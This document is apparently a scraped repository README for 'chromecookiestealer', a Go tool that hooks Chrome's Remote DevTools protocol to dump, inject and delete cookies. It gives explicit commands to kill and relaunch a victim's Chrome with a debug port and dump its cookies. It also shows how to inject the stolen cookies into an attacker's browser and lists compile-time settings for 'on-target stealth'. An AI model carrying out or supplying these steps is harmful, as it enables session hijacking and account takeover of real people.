Enable build support by adding .buildspec.yml
.gitignore Loading last commit info...

Chrome Cookie Stealer (and injector)

Attaches to Chrome using its Remote DevTools protocol and steals/injects/clears/deletes cookies.

Heavily inspired by WhiteChocolateMacademiaNut.

Cookies are dumped as JSON objects using Chrome's own format. The same format is used for cookies to be loaded.

For legal use only.


  • Dump Chrome's cookies
  • Inject dumped Cookies into (another instance of) Chrome
  • Clear Chrome's cookies
  • Defaults settable at compile time


Steal a victim's cookies:

git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json

Inject into the attacker's local browser:

# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json


Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name   - Name of the cookies to remove.
url    - If specified, deletes all the cookies with the given name where domain
         and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path   - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

  -chrome URL
    	Chrome remote debugging URL (default "ws://")
    	Clear browser cookies
  -delete file
    	Name of file containing parameters for cookies to delete
  -dump file
    	Name of file to which to dump stolen cookies
  -inject file
    	Name of file containing cookies to inject
    	Don't print a summary on exit
    	Enable verbose logging


go build should be all that's necessary. The following may be set at compile time with -ldflags '-X main.Foo=bar' for a touch more on-target stealth.

DumpFileName of a file to which to dump cookies. Implies -dump
InjectFileName of a file from which to inject cookies. Implies -inject
DeleteFileName of a file with parameters describing cookies to delete. Implies -delete
DoClearIf set to any value, implies -clear

None of the above are set by default.

The Chrome DevTools Protocol is a bit of a moving target. It may be necessary to use a newer version of the chromedp and cdproto libraries should this program stop working. This can be done with

go get -u -v all
go mod tidy
go build

which could well have the side-effect of breaking everything else.


Please wait...
Page is in error, reload to recover